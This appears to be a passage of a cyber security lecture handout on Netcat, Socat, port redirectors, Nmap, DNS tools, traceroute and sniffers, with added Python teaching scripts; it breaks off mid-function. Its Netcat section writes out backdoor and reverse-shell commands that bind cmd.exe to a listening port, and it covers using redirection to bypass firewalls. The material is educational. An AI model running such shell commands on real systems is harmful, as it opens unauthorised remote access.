Cyber Security - Lecture 11

This document discusses various cyber security tools including network vulnerability scanners like Netcat and Socat. It explains that vulnerability scanners identify security risks by scanning endpoints. Netcat is a utility that can perform tasks like port scanning, data transfer between systems, creating backdoors, and obtaining remote access using techniques like reverse shells. Socat is also a network scanning tool similar to Netcat but supports more protocols. The document also covers port numbers, port forwarding tools like Datapipe that redirect traffic between ports, and using these tools to bypass firewalls.

Uploaded by Alan Jacob

Cyber Security – Lecture 11

Contents
- Networks Vulnerability Scanning
- Understanding Port and Services tools
- TCP Handshake
  - Connection establishment
  - Connection termination
- Network Reconnaissance
- System Tools
- Brief about Domain Name Server (DNS)
- Network Sniffers and Injection tools

Need of Vulnerability Scanner
- The functions of vulnerability scanning are quite different from those of a firewall or an intrusion detection system.
- Vulnerability scanning tools help protect an organization from security risks and threats by deeply inspecting endpoints to ensure that they are configured securely and correctly.
- The prime aim of running a vulnerability scanner is to identify the devices that are open to vulnerabilities.
- There are different types of vulnerability scanners, for example: port scanners, network vulnerability scanners, host-based vulnerability scanners, web application security scanners, database security scanners, etc.

Networks Vulnerability Scanning
- A network vulnerability scanner is a software tool that scans an entire network and its nodes for security vulnerabilities and loopholes.
- A network security scanner is primarily used by network administrators to evaluate a network's security.
- A network security scanner scans for all known and possible vulnerabilities and threats.
- It scans all devices, including routers, servers, firewalls, client computers, etc.
- It checks for vulnerabilities such as password strength, open ports, scripts, operating system controls, etc.
- After analysis, scanners provide reports that include information about IT assets, associated vulnerabilities, prioritized threats, percentage of risk per vulnerability, etc.
- Here we will discuss two network vulnerability scanners:
  - Netcat
  - Socat

NetCat - nc
- netcat is a computer networking utility designed to read and write data across both TCP and UDP network connections.
- It is a feature-rich network debugging and investigation tool, since it can produce almost any kind of connection its user could need.
- Modern Unix-based systems include Netcat as part of their default command set.
- Cygwin makes Netcat available on Windows systems as well.
- Netcat works with several options. The following is the common Netcat syntax:

nc [options] [target system] [remote port]


Netcat Command Options
- -l
  - This option tells Netcat to be in listen mode.
  - It binds Netcat to a local port to await incoming TCP connections, making it act as a server.
- -u
  - This shifts Netcat from the default TCP mode to UDP mode.
  - It tells Netcat to bind to a UDP port instead of a TCP port.
- -e
  - This tells Netcat what program to execute after a successful connection.
  - It causes a listening Netcat to execute the command any time someone connects to the port on which it is listening.
- -p
  - Specifies the local port number.
- -z
  - Tells netcat to send only enough data to discover which ports are open.
- -v
  - Tells netcat to provide detailed reports; otherwise it reports only the data it receives.

Netcat Uses
- Netcat can be used for many purposes. It has a number of built-in capabilities:
  - Data transfer
  - Basic port scanning
  - Relays
  - Creating a backdoor
  - Reverse shells
  - Obtaining remote access to a shell
  - Port listening and redirection, etc.
- Data Transfer
  - Netcat can be used to transfer files between systems.
  - Data transfer can be done in two ways: from a listener to a client, or from a client to a listener.
  - In this example a file is transferred from a listener to a client.

  At listener: nc -l -p 6789 < test.txt
  At client:   nc 127.0.0.1 6789 > test.txt

- Perform Basic Port Scanning
  - Netcat can perform simple port scans to easily identify open ports.
  - This is done by specifying a range of ports to scan, along with the -z option to perform a scan instead of attempting to initiate a full connection.
  - The basic command line for Netcat is nc [options] host ports.
    - Here host represents the hostname or IP address to which the connection is to be made.
    - Ports represents either a single port or a port range on that host.

  Example: nc -z -v domain.com 1-1000
  or
  nc -z -n -v 198.51.100.0 1-1000
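The following Python script is an added example, not part of the lecture, showing what a -z style scan does at the socket level and what it looks like from the listening side. connect_scan completes the TCP handshake to each port and closes immediately without sending data, which is the "only enough data to discover which ports are open" behaviour described above; LoggingListener is a constructed stand-in for a service that records each accepted connection, so the scan's footprint (a burst of short, empty connections) is visible to a defender. The port range 5050-5064, the two "services" on 5055 and 5060, and the use of 127.0.0.1 are assumptions made for the demo.

```python
import socket
import threading


def connect_scan(host, ports, timeout=0.5):
    """Connect-scan `ports` on `host` the way `nc -z` does: complete the TCP
    handshake, send nothing, close at once. Returns {port: "open"/"closed"}."""
    results = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success and an errno instead of raising
            results[port] = "open" if s.connect_ex((host, port)) == 0 else "closed"
    return results


class LoggingListener:
    """Constructed stand-in for a service: records every accepted connection
    with the number of bytes the peer sent, so a scan's footprint (many
    short connections carrying no data) is visible from the defender's side."""

    def __init__(self, port):
        self.port = port
        self.log = []                       # (peer_port, bytes_received)
        self._stop = threading.Event()
        self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._sock.bind(("127.0.0.1", port))
        self._sock.listen(8)
        self._sock.settimeout(0.1)          # lets the loop notice the stop flag
        self._thread = threading.Thread(target=self._serve, daemon=True)
        self._thread.start()

    def _serve(self):
        while True:
            try:
                conn, peer = self._sock.accept()
            except socket.timeout:
                if self._stop.is_set():
                    break                   # nothing pending: safe to exit
                continue
            with conn:
                conn.settimeout(0.2)
                try:
                    data = conn.recv(1024)  # b"" when the peer closed at once
                except socket.timeout:
                    data = b""
                self.log.append((peer[1], len(data)))

    def close(self):
        self._stop.set()
        self._thread.join()
        self._sock.close()


def demo(service_ports=(5055, 5060), scan_range=range(5050, 5065)):
    """Start the constructed listeners, scan a range that covers them, and
    return the scan result plus what each listener recorded."""
    listeners = [LoggingListener(p) for p in service_ports]
    try:
        found = connect_scan("127.0.0.1", scan_range)
    finally:
        for listener in listeners:
            listener.close()
    return found, {l.port: l.log for l in listeners}


if __name__ == "__main__":
    found, seen = demo()
    print("open ports:", [p for p, state in found.items() if state == "open"])
    for port, entries in seen.items():
        print(f"listener {port}: {len(entries)} connection(s), "
              f"{sum(n for _, n in entries)} bytes received")
```

Running the script lists 5055 and 5060 as open and shows that each listener saw exactly one connection carrying zero bytes; that "connect, send nothing, disconnect" pattern repeated across many ports is what a connect scan looks like in service or firewall logs.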
- Relays
  - Netcat can be configured to bounce an attack from machine to machine.
  - The diagram on the slide shows how relays can be configured in practice.
- Create a backdoor
  - Netcat's most popular use by malicious users is to create a backdoor login shell.
  - The simple commands below create a backdoor.

  At listener: nc -l -p 1234 -e cmd.exe
  At client:   nc 127.0.0.1 1234

  - Note that -e is used to execute the action after the connection is established.
  - On Linux, these backdoors can be made persistent, which means that even after the current user logs out, the backdoor keeps running in the background.
- Reverse Shells
  - Netcat can also be used to push a shell session from the client to the server. This technique is called a reverse shell and can be achieved with the following commands:

  At listener: nc -l -p 1234
  At client:   nc 127.0.0.1 1234 -e cmd.exe

- Obtain Remote Access to a Shell
  - To get a command prompt of a Windows system from anywhere in the world, run the following netcat command on that Windows system:

  nc -l -e cmd.exe 10.0.1.2 4455

  - The above Ncat example opens a listener (-l) that will execute (-e) cmd.exe and attach the command prompt's input/output to any connection on port 4455.
  - This behaves like a system backdoor on the Windows system.

Socat
- Socat is a network scanning tool similar to Netcat.
- Netcat supports only the TCP and UDP protocols, but socat works over a number of protocols.
- It takes two "addresses". The general syntax is shown below:

socat [options] address1 address2

- Here the connection opens on both sides, i.e. it transfers data between two addresses.
- It can handle multiple connections.
- It supports dozens of address types.

Understanding Port and Services tools
- For a packet to reach its destination, it must have an IP address and a port.
- TCP assigns 16-bit port numbers for connections (ports 0 through 65535).
- Well-known ports (ports 0 to 1023):
  - The well-known ports are controlled and assigned by the Internet Assigned Numbers Authority (IANA).
  - Well-known services like e-mail and the Web have predefined destination port numbers; e-mail uses port 25 (SMTP), and the Web uses 80 (HTTP) and 443 (HTTPS).
  - This doesn't mean web services must always listen on port 80. Having a default port gives clients a better chance of discovering services and makes network administration easier.
  - For example, network administrators can more easily create security rules and monitor expected traffic if a service always uses a predictable port.
- Registered ports (ports 1024 to 49151):
  - The port range 1024 through 49151 is referred to as the group of registered ports.
- Dynamic ports (ports 49152 to 65535):
  - The range 49152 through 65535 contains the dynamic, or ephemeral, ports.

Port forwarding or redirecting tools
- A port redirection tool works by receiving data on one IP/port combination and forwarding the data to another IP/port combination.
- It works as an intermediary between the original client and the destination.
- Port redirection is most useful for bypassing network access controls (e.g. bypassing firewalls) or crossing network boundaries.
- Fpipe, Datapipe and WinRelay are three free and simple tools designed to do simple port forwarding.
- Datapipe
  - Datapipe is a Unix-based port redirection tool.
  - Datapipe forwards traffic between TCP ports only.
  - It passes TCP/IP traffic received by the tool on one port to another port to which the tool points.
  - It functions as a channel for TCP/IP connections, not an endpoint.
  - Aside from holding IP addresses and port numbers, port redirection is protocol-ignorant. It doesn't care whether you pass encrypted SSH traffic or plain text.
  - Datapipe does not perform protocol conversion or any other data manipulation.
- Datapipe: general syntax

  $ ./datapipe localhost localport remoteport remotehost

  - The localhost argument indicates the IP address on which to open the listening port.
  - The localport argument indicates the listening port on the local system; connections will be made to this port number.
  - The remoteport argument indicates the port to which data is to be forwarded.
  - The remotehost argument indicates the hostname or IP address of the target.
  - The easiest conceptual example of port redirection is forwarding HTTP traffic.
  - In this example, a connection coming to local port 9080 is redirected to remote port 80 of the remote host (www.google.com):

  $ ./datapipe my.host 9080 80 www.google.com
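As an added example (not from the lecture, and not the code of Datapipe or Fpipe), this Python script implements the same protocol-ignorant TCP redirection the slides describe: Redirector listens on a local port and copies bytes in both directions between each client and the configured remote host and port without inspecting them, which is why it relays encrypted SSH and plain text alike. The EchoServer, the loopback addresses and the OS-chosen ports (port 0) are constructed so the demo runs offline; in use, the remote would be the real target host and port.

```python
import socket
import threading


def _pump(src, dst):
    """Copy bytes from src to dst until src hits EOF, then pass the EOF on by
    shutting down dst's write side. No parsing: the relay is protocol-ignorant."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


class Acceptor:
    """Background accept loop on host:port; subclasses define handle(conn)."""

    def __init__(self, host, port):
        self._stop = threading.Event()
        self._srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self._srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self._srv.bind((host, port))
        self._srv.listen(8)
        self._srv.settimeout(0.1)                 # lets the loop see the stop flag
        self.port = self._srv.getsockname()[1]   # real port when 0 was requested
        threading.Thread(target=self._loop, daemon=True).start()

    def _loop(self):
        while not self._stop.is_set():
            try:
                conn, _ = self._srv.accept()
            except socket.timeout:
                continue
            except OSError:
                break                             # listening socket was closed
            threading.Thread(target=self.handle, args=(conn,), daemon=True).start()

    def close(self):
        self._stop.set()
        self._srv.close()


class Redirector(Acceptor):
    """Equivalent of `datapipe localhost localport remoteport remotehost`:
    every client accepted locally gets its own connection to the remote side."""

    def __init__(self, local_host, local_port, remote_host, remote_port):
        self.remote = (remote_host, remote_port)
        self.connections = 0
        super().__init__(local_host, local_port)

    def handle(self, client):
        upstream = socket.create_connection(self.remote)
        self.connections += 1
        back = threading.Thread(target=_pump, args=(upstream, client))
        back.start()
        _pump(client, upstream)                   # client -> remote direction
        back.join()                               # remote -> client direction
        client.close()
        upstream.close()


class EchoServer(Acceptor):
    """Constructed upstream service for the demo: echoes whatever it receives."""

    def handle(self, conn):
        _pump(conn, conn)
        conn.close()


def demo(message=b"GET / HTTP/1.0\r\n\r\n"):
    """Send `message` through the redirector to the echo server; return the
    reply and how many connections the redirector relayed."""
    echo = EchoServer("127.0.0.1", 0)
    redir = Redirector("127.0.0.1", 0, "127.0.0.1", echo.port)
    try:
        with socket.create_connection(("127.0.0.1", redir.port)) as c:
            c.sendall(message)
            c.shutdown(socket.SHUT_WR)            # our side is done sending
            reply = b""
            while True:
                chunk = c.recv(4096)
                if not chunk:
                    break
                reply += chunk
        return reply, redir.connections
    finally:
        redir.close()
        echo.close()


if __name__ == "__main__":
    reply, count = demo()
    print(f"relayed {count} connection(s); reply: {reply!r}")
```

The client never learns the echo server's port: it only ever talks to the redirector, which is the intermediary role the slides describe. Because the relay is blind to content, the only place such traffic can be inspected is at either endpoint, which is also why a redirector inside a network is worth detecting by its listening port and the unexpected outbound connections it makes.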
- Fpipe
  - It is provided by McAfee.
  - It implements the port redirection technique natively on Windows.
  - Fpipe adds more capability than Datapipe.
  - It also adds UDP support, which Datapipe lacks.
  - Fpipe does not require any support DLLs (dynamic-link libraries) or privileged user access.
  - It runs on all Windows platforms.
  - The lack of support DLLs makes it easy to pick up fpipe.exe and drop it onto a system.
  - Example: C:\> fpipe -l 9080 -r 80 www.google.com
    - -l: the listening port number.
    - -r: the remote port number (the port to which traffic is redirected).
- WinRelay
  - It is another Windows-based port redirection tool.
  - It supports both TCP and UDP.
  - It works with both IPv4 and IPv6 address types.
  - WinRelay and Fpipe share the same features.
  - Antivirus software may report WinRelay as malicious, because it considers the tool's sole purpose to be serving as part of an exploit kit for compromising systems.

TCP: Connection establishment
- To establish a connection, TCP uses a three-way handshake.
  - SYN: The connection request is performed by the client sending a SYN to the server.
  - SYN-ACK: In response to the SYN, the server replies with a SYN-ACK.
  - ACK: Finally, the client sends an ACK back to the server.

TCP: Connection termination
- The connection termination phase uses a four-way handshake, with each side of the connection terminating independently.
- When an endpoint wishes to stop its half of the connection, it transmits a FIN packet, and the other end acknowledges with an ACK.
- To terminate the connection completely, a pair of FIN and ACK segments must be generated from both TCP endpoints, as shown in the figure on the slide.
- After the final ACK, the endpoint waits for a timeout before finally closing the connection.

Network Reconnaissance
- Reconnaissance is the process of acquiring information about a network: a preliminary survey to gain information.
- Hackers use reconnaissance as the first step of an effective attack. They find out as much information about the target as possible before launching the first attack.
- By conducting determined, methodical reconnaissance, attackers can determine how best to mount their attacks successfully.
- Generally, the goals of reconnaissance on a target network are to:
  - Locate the network and identify the IP addresses of hosts
  - Find out accessible UDP and TCP ports
  - Identify open ports and the underlying applications
  - Identify the OS type of each host
  - Identify active machines
  - Map the network
- Nmap and THC-Amap are examples of tools designed for network reconnaissance.

Nmap
- Network Mapper, or Nmap, is a free and open-source network scanner.
- Nmap started as a Linux utility and was ported to other systems, including Windows, macOS, etc.
- Nmap is used to discover hosts and services on a computer network by sending packets and analyzing the responses.
- General syntax:

$ nmap [Scan Type(s)] [Options] {target specification}

Nmap: Typical Features
- Identify hosts on the network
- Scan for TCP and UDP ports (port scanning)
- Scan for protocols
- Identify a target's operating system
- Scriptable interaction with the target
- Version detection
- Camouflage the scan (hide scanning from security monitoring devices like firewalls)
- Nmap can provide further information on targets, device types, and MAC addresses.

- Identify Hosts on the Network
  - To determine which hosts (i.e., IP addresses) on a network are live, use the ping scanning method. It sends ICMP echo requests to the specified range of IP addresses and awaits a response. Based on the responses, information about the network can be retrieved.
  - Nmap applies the ICMP probing concept to TCP ports as well.
  - For example, by sending SYN or ACK packets to a TCP port, nmap can infer whether a host is live or not based on the response received.
  - If it receives any response, Nmap assumes the host has responded and is live.
  - If it receives nothing, the host is assumed to be not live, not currently on the network, or ignoring connections to the target port.
- Scan for TCP Ports
  - The basic method of TCP port scanning is to call a TCP connect function for the port and wait for a response.
  - The connect function conducts the TCP three-way handshake and tries to establish a connection.
  - The table on the slide lists the conclusions nmap draws after getting replies to its various requests.
- Scan for UDP Ports
  - Scanning for UDP services is more error-prone than scanning for TCP services, because UDP does not support the same state handling of connection handshakes, resets, re-requests, and so on.
- Scan for Protocols
  - This is used to identify whether a port supports a particular type of protocol or not.
  - For example, if we attempt to connect to a UDP port, the conclusions shown on the slide can be drawn.
- Camouflage the Scan
  - Nmap includes options that hide its scanning process from network security and monitoring devices like firewalls.
- Identify a Target's Operating System
  - One of Nmap's most useful features is the capability to determine a host's operating system based on its responses to specific packets.
- The Nmap Scripting Engine (NSE)
  - It is one of Nmap's most powerful and flexible features.
  - It allows users to write their own code to automate a wide variety of networking tasks.
  - The code is written in the Lua programming language.
  - These scripts are then executed in parallel, with the speed and efficiency you expect from Nmap.

THC-Amap
- Like Nmap, Amap is a scanning tool that allows you to identify the applications running on a specific port or ports.
- It is developed by The Hacker's Choice (THC), hence the name THC-Amap.
- Scanning is done by sending trigger packets to the respective ports. These trigger packets will typically be an application protocol handshake, such as one carried over TCP.
- Amap then looks up the response to the trigger in a list and prints out any match it finds.
- Amap supports many protocols: TCP and UDP, and regular and SSL-enabled ASCII and binary protocols.
- Amap has three modes of execution. A scan may use only one mode at a time.

Domain Name Servers: DNS
- As we know, every machine on a network has an IP address assigned to it, which is like a unique address of that machine in our network.
- In a similar way, every website on the internet has an IP address associated with it, but we normally don't use those IP addresses to access the website; instead we use a name like google.com or facebook.com.
- Just imagine how hard it would be to remember the IP addresses of all these websites if these names were not in use.
- So how do these names translate into IP addresses? That is the job of DNS servers.
- Domain Name Servers (DNS) are the Internet's equivalent of a phone book.
- They maintain a directory of domain names and translate them to Internet Protocol (IP) addresses.
- For example: domain name www.turnonvpn.org, IP address 198.61.190.243.
- When you type in a web address, e.g. www.turnonvpn.org, your Internet Service Provider looks up the DNS associated with the domain name, translates it into a machine-friendly IP address and directs your Internet connection to the correct website.
- Terminology used in DNS
  - Domain name registrant: the organization or individual registering the domain name.
  - Registrar: the company that takes your registration request and reserves your domain for you at the main registry.
  - Registry: during the domain name registration process, you will be asked to provide the registrar with contact and technical information. The registrar then submits the information to the central directory, also known as the registry.
  - Information from all the domain name servers across the Internet is gathered together and housed at the central registry.
  - Hosting companies and Internet Service Providers interact with the central registry on a regular schedule to get updated DNS information.

System tools
- System tools provide single-purpose functions related to network information for a host.
- Examples:
  - Whois
  - Host
  - Dig
  - Nslookup
  - Traceroute

System tools: Whois
- WHOIS ("who is") is a query and response protocol. It is basically a method for checking information about the ownership of a domain name.
- It is widely used for querying databases.
- The databases store information such as domain names, IP addresses and other details of the registered users (e.g. name, address, email, phone number, etc.).
- The databases are collectively called the "whois" servers because they answer the question of who is associated with an IP address or domain name.
- Whois servers are maintained by domain name authorities around the world and are available for the public to see who owns a domain name, along with other information.
- An example result of the whois utility is given on the slide. By running the command

$ whois facebook.com

  the response shown on the slide is received from a database server. The result shows all the available information about the domain name.
- Purpose of domain WHOIS
  - To determine whether a given domain name is available.
  - To obtain the real-world identity, business location and contact information of the user (domain name registrant) who uses the domain name.
  - To contact network administrators for the resolution of technical matters related to networks associated with a domain name.
  - To contact a domain name registrant on matters related to the protection and enforcement of intellectual property rights, etc.

System tools: Traceroute
- Another descriptively named command is traceroute.
- It traces the route of an IP packet from its source to its destination.
- The traceroute command starts by sending an IP packet (either ICMP or UDP) to the target, but it sets the TTL (Time To Live) field to 1.
- Each device that a packet passes through is supposed to decrement the TTL by one. Consequently, the packet "expires" (stops being routed) at the first hop because the TTL has reached 0.
- The routing device informs the sender that this has happened with an ICMP message.
- Traceroute then sends another IP packet off to the destination, but this time with the TTL field set to 2. The packet expires at the second hop, at which point that routing device responds with an ICMP message.
- By continually incrementing the TTL until the packet reaches its destination, traceroute can discover which network devices exist between your host and the destination.
- The traceroute command helps diagnose certain kinds of routing problems.
- For example, it can identify the point in a network that prevents packets from reaching their destination.
- The list of hops may also provide a hint at the geographical path and location of a target, based on hostnames.
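The TTL mechanism above, worked through in Python as an added example that is not part of the lecture. A real traceroute needs raw sockets, so the network here is a constructed model: SimulatedPath holds the devices between the probing host and the destination, each one decrements the TTL and answers with an ICMP Time Exceeded message when it reaches zero, and a silent device models a filtering hop that drops probes without answering, which is the "point that prevents packets from reaching their destination" the slide mentions. The addresses come from the RFC 5737 documentation ranges; giving up after three unanswered probes in a row is a choice of this demo, not a property of the traceroute command.

```python
from dataclasses import dataclass


@dataclass
class Device:
    """A router on the constructed path. A silent device drops probes without
    answering, which is how a filtering firewall shows up in traceroute."""
    address: str
    silent: bool = False


class SimulatedPath:
    """Chain of devices between the probing host and `destination`. Each hop
    decrements the TTL and answers ICMP Time Exceeded when it reaches zero."""

    def __init__(self, devices, destination):
        self.devices = devices
        self.destination = destination

    def probe(self, ttl):
        """Return (replying address or None, kind of reply) for one probe."""
        for device in self.devices:
            if device.silent:
                return None, "no-reply"           # dropped, nothing comes back
            ttl -= 1
            if ttl == 0:
                return device.address, "time-exceeded"
        return self.destination, "destination-reached"


def traceroute(path, max_hops=30, give_up_after=3):
    """Send probes with TTL 1, 2, 3, ... until the destination answers, the
    hop limit is hit, or several consecutive probes get no reply at all."""
    route, silent = [], 0
    for ttl in range(1, max_hops + 1):
        replier, kind = path.probe(ttl)
        route.append((ttl, replier or "*"))       # traceroute prints * for silence
        if kind == "destination-reached":
            break
        silent = silent + 1 if kind == "no-reply" else 0
        if silent >= give_up_after:
            break
    return route


def demo(firewall_drops=False):
    """Constructed path (RFC 5737 addresses): two routers, then the target.
    With firewall_drops=True the second router silently discards probes."""
    devices = [Device("198.51.100.1"), Device("203.0.113.1", silent=firewall_drops)]
    return traceroute(SimulatedPath(devices, "203.0.113.50"))


if __name__ == "__main__":
    for ttl, who in demo():
        print(f"{ttl:2}  {who}")
    print("with a silent hop:")
    for ttl, who in demo(firewall_drops=True):
        print(f"{ttl:2}  {who}")
```

The first run lists each router in order and then the destination at TTL 3; the second stops naming devices after the first hop and prints only asterisks, which is exactly the picture an administrator uses to locate the device that is blocking traffic.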
System tools: host, dig, and nslookup
- Domain Name System
  - DNS is a service which translates IP addresses into domain names and vice versa.
- Berkeley Internet Name Domain (BIND)
  - BIND is the most widely used domain name server on the Internet.
  - It is open-source DNS software.
  - BIND implements the DNS protocols for the Internet, which gives us the ability to perform IP-to-domain-name conversion and vice versa.
- host, dig, and nslookup are the client utilities of the DNS server BIND.
- These tools are used to query DNS servers about what they know.
- These tools can also be used to test our DNS configuration.
- You do not need to install BIND to obtain these DNS client tools. By default they are part of a Unix-based system's core networking commands.

System tools: nslookup
- The name "nslookup" means "name server lookup".
- nslookup is a network administration command-line tool.
- It is used for querying the Domain Name System (DNS) to obtain domain-name-to-IP-address mappings, or other DNS records.
- nslookup operates in interactive or non-interactive mode.
- Used interactively, the nslookup command enters a shell from which you can change servers, set query options, and debug DNS.

System tools: host
- The host and nslookup tools perform the same function.
- host is a simple utility for performing DNS lookups.
- It is normally used to convert names to IP addresses and vice versa.
- You can use the host command to get answers to simple host queries.
- When no arguments or options are given, host prints a short summary of its command-line arguments and options.
- Standard queries used:
  - Making a host query using an IP address
  - Finding out the domain name servers
  - Displaying MX records
  - Finding out the domain TXT record
  - Finding out the SOA record

System tools: dig
- Both dig and host were tools designed to address the scripting and simplicity-of-query issues of nslookup.
- dig is another useful command-line tool which you can use to gather information from DNS servers.
- dig is a command-line utility for probing the DNS.
- It produces multi-line output that you have to inspect as a whole, but gives you a more detailed answer than host.
- Most DNS administrators use dig to troubleshoot DNS problems because of its flexibility, ease of use and clarity of output.
- Other lookup tools tend to have less functionality than dig.
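To show what host, dig and nslookup actually send and receive, and what the "phone book" lookup described in the DNS section looks like on the wire, here is an added Python example (not from the lecture) that builds a DNS query and parses a reply, including the name compression pointers that real answers use. The reply is constructed locally by build_response rather than fetched from a server, so the example runs offline; www.example.com, its CNAME to example.com and the address 192.0.2.1 are placeholder values. The hop limit in decode_name is the kind of check a parser needs, since a malformed reply can contain a pointer loop.

```python
import struct

TYPE_A, TYPE_NS, TYPE_CNAME = 1, 2, 5


def encode_name(name):
    """Turn 'www.example.com' into DNS label form: length-prefixed labels, 0 end."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii")
                   for label in name.rstrip(".").split("."))
    return out + b"\x00"


def build_query(name, qtype=TYPE_A, txid=0x1234):
    """Standard query with the RD (recursion desired) bit set, as a stub
    resolver or `dig` would send it to UDP port 53."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def decode_name(msg, offset, max_hops=32):
    """Read a possibly compressed name at `offset`; return (name, next offset).
    The bounded hop count guards against pointer loops in malformed replies."""
    labels, end, hops = [], None, 0
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:                 # two-byte compression pointer
            hops += 1
            if hops > max_hops:
                raise ValueError("compression pointer loop")
            if end is None:
                end = offset + 2                  # parsing resumes after it
            offset = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if end is not None else offset)


def parse_response(msg):
    """Parse the header, question and answer sections of a DNS reply."""
    txid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", msg[:12])
    offset, questions, answers = 12, [], []
    for _ in range(qd):
        qname, offset = decode_name(msg, offset)
        qtype, _qclass = struct.unpack("!HH", msg[offset:offset + 4])
        offset += 4
        questions.append((qname, qtype))
    for _ in range(an):
        name, offset = decode_name(msg, offset)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[offset:offset + 10])
        offset += 10
        if rtype == TYPE_A and rdlen == 4:
            data = ".".join(str(b) for b in msg[offset:offset + 4])
        elif rtype in (TYPE_NS, TYPE_CNAME):      # rdata is itself a name
            data, _ = decode_name(msg, offset)
        else:
            data = msg[offset:offset + rdlen]
        offset += rdlen
        answers.append({"name": name, "type": rtype, "ttl": ttl, "data": data})
    return {"id": txid, "rcode": flags & 0x000F, "questions": questions, "answers": answers}


def build_response(query, rrs):
    """Constructed reply to `query`: echoes its question and appends one RR per
    (type, ttl, rdata) tuple, naming the owner with a pointer to offset 12."""
    txid = struct.unpack("!H", query[:2])[0]
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, len(rrs), 0, 0)  # QR, RD, RA set
    body = b"".join(b"\xc0\x0c" + struct.pack("!HHIH", t, 1, ttl, len(rd)) + rd
                    for t, ttl, rd in rrs)
    return header + query[12:] + body


def demo():
    """Resolve www.example.com through a constructed CNAME + A answer."""
    query = build_query("www.example.com")
    reply = build_response(query, [
        (TYPE_CNAME, 300, encode_name("example.com")),
        (TYPE_A, 60, bytes([192, 0, 2, 1])),      # RFC 5737 test address
    ])
    return parse_response(reply)


if __name__ == "__main__":
    for rr in demo()["answers"]:
        print(rr)
```

The parsed answers are the same records dig prints in its ANSWER SECTION, one dictionary per resource record with owner name, type, TTL and data. Matching the transaction id in the reply against the one sent is the first check a resolver makes before accepting an answer.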
Network Sniffers and Injection tools
- A network sniffer can listen to and record any raw data that passes through it.
- Sniffers are useful tools for system and network administrators.
- A sniffer typically operates at the Data Link layer of the OSI model, so it does not have to play by the rules of any higher-level protocol.
- Sniffers are effective debugging tools and equally effective hacking tools.
- One way to limit the impact of sniffers is to employ encrypted channels for communicating with services.
- Examples of sniffers:
  - Tcpdump
  - Windump
  - Wireshark
  - Ettercap
  - Hping
  - Kismet

Tcpdump
- Tcpdump is a highly configurable, command-line packet sniffer for Unix.
- The tcpdump command is present by default on most Unix-based systems.
- It has long been a part of Unix due to its usefulness in debugging networks and services.
- Tcpdump was made strictly for:
  - network monitoring
  - traffic analysis and testing
  - packet inspection
- It captures a lot of useful low-level information about the packets passing on the network, and it can help diagnose all kinds of network problems.
- Tcpdump filters enable you to extract any combination of network packets.
- But it does not extract detailed information from higher-level protocols like HTTP, SNMP, or DNS into more human-readable formats.
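As an added example (not from the lecture, and not tcpdump's code), the Python below decodes raw Ethernet/IPv4/TCP frames the way a Data Link layer sniffer sees them, prints each in tcpdump's "Flags [S.]" notation, and labels the packets of one connection with the SYN, SYN-ACK, ACK and FIN steps from the TCP connection establishment and termination sections. The frames are constructed in demo_capture (hosts from the RFC 5737 range, MAC addresses and sequence numbers made up, checksums left at zero), so nothing is captured from a real interface.

```python
import struct

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20
CLIENT, SERVER = "192.0.2.10", "192.0.2.20"      # constructed (RFC 5737) hosts


def ip_bytes(text):
    return bytes(int(x) for x in text.split("."))


def ip_text(raw):
    return ".".join(str(b) for b in raw)


def build_frame(src_ip, dst_ip, sport, dport, flags, seq=0, ack=0):
    """Constructed Ethernet + IPv4 + TCP frame. Checksums stay zero: the frame
    exercises the decoder and is not meant to be transmitted."""
    eth = bytes.fromhex("001122334455") + bytes.fromhex("66778899aabb") + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, ack, 5 << 4, flags, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6, 0,
                     ip_bytes(src_ip), ip_bytes(dst_ip))
    return eth + ip + tcp


def decode_frame(frame):
    """Walk the link, network and transport headers the way a sniffer does.
    Returns None for non-IPv4 frames and omits TCP fields for non-TCP packets."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                      # IPv4 header length in bytes
    pkt = {"src": ip_text(ip[12:16]), "dst": ip_text(ip[16:20]), "proto": ip[9]}
    if ip[9] != 6:
        return pkt
    sport, dport, seq, ack, _, flags = struct.unpack("!HHIIBB", ip[ihl:ihl + 14])
    pkt.update(sport=sport, dport=dport, seq=seq, ack=ack, flags=flags)
    return pkt


def tcpdump_flags(flags):
    """Render flag bits with tcpdump's letters and ordering ('.' is ACK)."""
    table = ((FIN, "F"), (SYN, "S"), (RST, "R"), (PSH, "P"), (ACK, "."), (URG, "U"))
    return "".join(letter for bit, letter in table if flags & bit) or "none"


def tcpdump_line(pkt):
    """One tcpdump-style summary line for a decoded TCP packet."""
    return (f"{pkt['src']}.{pkt['sport']} > {pkt['dst']}.{pkt['dport']}: "
            f"Flags [{tcpdump_flags(pkt['flags'])}], seq {pkt['seq']}, ack {pkt['ack']}")


def stage(pkt):
    """Name the handshake or teardown step a packet belongs to, from its flags."""
    f = pkt["flags"]
    if f & RST:
        return "RST"
    if f & SYN:
        return "SYN-ACK" if f & ACK else "SYN"
    if f & FIN:
        return "FIN"
    return "ACK" if f & ACK else "other"


def demo_capture():
    """Constructed capture: the three-way handshake, then the four-way close in
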